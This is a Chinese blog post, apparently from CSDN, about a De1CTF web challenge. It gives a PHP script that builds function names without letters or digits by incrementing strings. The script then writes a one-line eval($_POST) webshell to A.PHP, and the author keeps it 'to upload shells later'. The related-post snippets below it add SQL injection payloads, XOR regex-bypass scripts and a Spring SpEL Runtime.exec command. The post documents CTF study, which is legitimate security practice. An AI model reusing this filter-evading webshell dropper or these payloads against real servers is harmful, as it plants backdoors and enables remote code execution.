记一个过滤字母数字异或取反等操作写shell的php脚本

最新推荐文章于 2022-01-18 21:08:09 发布
最新推荐文章于 2022-01-18 21:08:09 发布
阅读量552 收藏 3
点赞数
分类专栏: web安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42513429/article/details/105941621
版权

记一个过滤字母数字异或取反等操作写shell的php脚本

前几天的De1CTF有一个过滤了字母数字异或取反等运算的题,第一步就是上传一个脚本

上传脚本只是第一步,访问生成A.PHP写一个小马,然后就可以蚁剑连接,但是之后就没思路了,看了大佬们的wp是真的跪了,这里单纯记录一个脚本,一开始写的洋洋洒洒超过了2048个字符,后面老老实实的做优化,这里删掉换行还能精简,为了代码展示效果就保留了
旁边写了对应的字符,实际上传过程是需要删去的,可以说是很精简了,自己保留一下以后说不定传shell还能用

<?=$_=[]?>
<?=$_="$_"?>
<?=$_=$_["!"!="!"]?>
<?=$__=$_?><?="A"?>
<?=++$_?>
<?=$__________=++$_?><?="C"?>
<?=++$_?>
<?=$_____=++$_?><?="E"?>
<?=$___________=++$_?><?="F"?>
<?=++$_?>
<?=$____________=++$_?><?="H"?>
<?=$_____________=++$_?><?="I"?>
<?=++$_?>
<?=++$_?>
<?=$_______=++$_?><?="L"?>
<?=++$_?>
<?=$________=++$_?><?="N"?>
<?=$_________=++$_?><?="O"?>
<?=$___=++$_?><?="P"?>
<?=++$_?>
<?=++$_?>
<?=$______=++$_?><?="S"?>
<?=$____=++$_?><?="T"?>
<?=$______________=++$_?><?="U"?>
<?=$_______________=++$_?><?="V"?>
<?=$________________=$___________.$_____________.$_______.$_____."_".$___.$______________.$____."_".$__________.$_________.$________.$____.$_____.$________.$____.$______?>
<?=$_________________="<?=".$_____.$_______________.$__.$_______."($"."_".$___.$_________.$______.$____."['".$___."'])"."?>" ?>
<?=$________________($__.".".$___.$____________.$___,$_________________)?>
<?='file_put_contents("A.PHP", "<?=eval(" . "$" . "_POST[P])?>")'?>
sillyboy_lch
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CRC计算器、和、异或异或取反校验
01-10
CRC计算器工具,有和、异或异或取反等校验方法计算,方便前期应用开发
关于php异或脚本
wuerror的博客
07-26 1233
最近做了道使用异或绕过preg_match()的题,正则的要求是没有字母数字。 网上翻文章,搜集了两个脚本 #朋友给的,也不知道最早是哪个师傅的 def encode(command): code = "~`!@#$%&*()-=+_[]{};:<>,.?/|" result_1 = "" result_2 = "" for x in command: if not command.isalpha(): r
shellcode编码之异或
qq_44119514的博客
02-21 2241
之前实验的时候,弹DOS窗口的shellcode发现有\x00。根据程序要求,shellcode是不能有这样的字符串在里面,否则在使用一些函数(如:strcpy())会产生00截断: #include "stdafx.h" #include "stdio.h" #include "windows.h" #include"stdlib.h" char shellcode[]="\x55\x8...
shell 脚本实现二进制文件数据的异或(xor)操作
bruce_wen的专栏
02-04 4653
源码: #!/bin/sh#get file lengthfile_len=`ls -l $1 | awk {print $5;}`> $3count=0until [ "$count" -ge "$file_len" ]do        #get one byte data        temp_buffer=`hexdump  -x -s $count  -n 1
关于使用异或绕过PHP过滤的方法
qq_54941823的博客
01-18 921
学前基础 异或:只能够是数字数字之间的异或,原理是转换为二进制进行异或 URL编码使用的也是十六进制的编码,十六进制异或编码的时候用的都是0xff,也就是十进制的255 过程简述:数据的十进制——转换十六进制——进行0xff异或(回到了十进制)——转换为十六进制——再次进行0xff异或得到数据本身 字符——十进制——十六进制进行异或——变回十进制——转到十六进制进行异或——变回十进制——转为字符回到原本字符 实例(_GET) #此处使用python演示 _: 计算前字符 ...
一个字符串中的字母取反,大变小,小变大
happysmartgirl的博客
04-26 155
let str = 'abcABC'; let str1 = '' for(let i=0;i<=str.length-1;i++){ if(str.charCodeAt(i)>=97&&str.charCodeAt(i)<=122){ str1 += str[i].toUpperCase() console.log(str1) }else{ str1 += str[i].toLowerCase() console.log(str1) }
32位异或取反小工具
07-30
For ‘Message header + Dialog header + Transaction header + Operation information’, perform XOR by 32 bits, and take the inverse of the XOR result as the checksum
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
C语言位运算符与或异或取反左移和右移.pdf
最新发布
06-09
C语言位运算符与或异或取反左移和右移.pdf
异或操作
cug_coffee的博客
10-29 438
1至1000里面只有一个重复,现在需要找出这个数 一个数组中只有一个数字发生了一次,其他的都是两次,找出这个数字 一个数组中有两个数发生了一次,其他的都是两次,找出这两个数这里这个题目都是用抑或操作来处理数组里面的数据。 主要是下面这个公式// NOTICE : B = A ^ (B ^ A)第一题直接上代码了#include <iostream> #include <cstring> #incl
shell中的数值操作
XiaoBaWu的博客
12-15 818
最原始的方法是使用expr命令
如何把一个字符串的大小取反?(大转小/小转大
M_Jin的博客
03-14 2012
let str = “AbC”; // ‘AbC’为要取反的字符串 str = str.replace(/[a-zA-Z]/g,content => { //content=> 每次正则匹配的结果 //验证是否为大字母(2种): //1.把字母转换为大后看是否和之前一样;如果一样说明原字母是大,将原字母转换成大即可。反之同理。 //content.toUppe...
[极客大挑战 2019]FinalSQL
weixin_42513429的博客
04-14 2384
[极客大挑战 2019]FinalSQL 盲注 盲注比较麻烦,这个题尤为恶心,flag藏得好深,有点坑 首先查询数据库名 python脚本核心payload: "id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid) ![查询数据库](https://img-blog.csdnimg.cn/202004142054...
[极客大挑战 2019]HardSQL
weixin_42513429的博客
04-14 722
[极客大挑战 2019]HardSQL报错注入updatexml()报错注入extractvalue()报错注入 报错注入 updatexml()报错注入 打一个单引号,出现报错,再打一个单引号,发现没有报错了,所以考虑是单引号闭合,然后考虑and等关键字,发现拦截,考虑报错注入,空格也过滤了,考虑括号代替,表单提交的数据使用get方法转发到check.php,所以直接通过check.php ge...
vulhub-Spring Messaging 远程命令执行漏洞(CVE-2018-1270)
weixin_42513429的博客
08-20 444
https://vulhub.org/#/environments/spring/CVE-2018-1270/ 根据官方的说法,应用的场景各不相同,官方的exp代码还是很容易看懂的 1、基础地址,在vulhub中为http://your-ip:8080/gs-guide-websocket 2、待执行的SpEL表达式,如T(java.lang.Runtime).getRuntime().exec('touch /tmp/success') 3、某一个订阅的地址,如vulhub中为:/topic/gree.
sqlilabs注入到webshell的无聊尝试
weixin_42513429的博客
04-29 359
sqlilabs注入到webshell的无聊尝试 使用phpstudy搭建好环境,PHP环境为5.6.9,数据库版本为5.7 Less-1 很常见的注入,单引号报错,再加一个单引号不报错,猜测数据库语句为: select * from xxx where id='$id' limit 1 所以我们构建payload: ?id=1' order by 3 --+ ?id=1' order by 4...
vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现
weixin_42513429的博客
08-19 239
https://www.cnblogs.com/litlife/p/10380701.html https://blog.csdn.net/qq_45300786/article/details/119249422 参考别人的博客,对CVE-2016-4977进行复现 Spring Security OAuth SpEL表达式注入 影响范围(复制来的): Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring .
攻防世界python-trade
weixin_42513429的博客
04-29 217
攻防世界python-tradepyc解密 pyc解密 直接在线解:https://tool.lu/pyc/ 解密出来是py2的代码,逻辑比较简单 correct = 'XlNkVmtUI1MgXWBZXCFeKY+AaXNt' 先把这个correct base64解一下 correct = '^SdVkT#S ]`Y\!^)€ism' 然后encode函数反着异或加密重新异或一下就回去...
帮我一个两串带空格的数字异或脚本
03-29
我们可以使用Python编一个简单的脚本来实现两串带空格的数字异或操作: ```python # 输入两串带空格的数字 num1 = input().split() num2 = input().split() # 将数字转换为整数并进行异或操作 result = [int(num...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值